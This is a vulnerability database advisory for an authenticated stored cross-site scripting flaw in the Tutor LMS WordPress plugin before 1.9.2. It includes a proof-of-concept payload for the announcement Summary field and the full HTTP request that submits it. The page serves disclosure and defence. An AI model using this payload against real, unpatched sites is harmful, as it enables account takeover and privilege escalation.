Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitPhu TranWPEX-ID:9EF14CF1-1E04-4125-A296-9AA5388612F9
HistoryJun 28, 2021 - 12:00 a.m.

Tutor LMS < 1.9.2 - Authenticated Stored Cross-Site Scripting (XSS)

2021-06-2800:00:00
Phu Tran
171
JSON

The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.

As a Tutor Instructor, Create an Announcement and put the following payload in the Summary field: " style="animation-name:rotation" onanimationstart="alert(/XSS/)//

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 341
Connection: close
Cookie: [Tutor Instructor+]

_tutor_nonce=52e764441f&tutor_announcement_course=973&tutor_announcement_title=Test+Inst+XSS&tutor_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action=tutor_announcement_create&action_type=create

Related

wpvulndb 1
osv 1
prion 1
cve 1
wpvulndb
wpvulndb
Tutor LMS < 1.9.2 - Authenticated Stored Cross-Site Scripting (XSS)
2021-06-28 00:00:00
osv
osv
CVE-2021-24455
2021-08-02 11:15:09
prion
prion
Cross site scripting
2021-08-02 11:15:00
cve
cve
CVE-2021-24455
2021-08-02 11:15:00
JSON
Related for WPEX-ID:9EF14CF1-1E04-4125-A296-9AA5388612F9
wpvulndb1osv1prion1cve1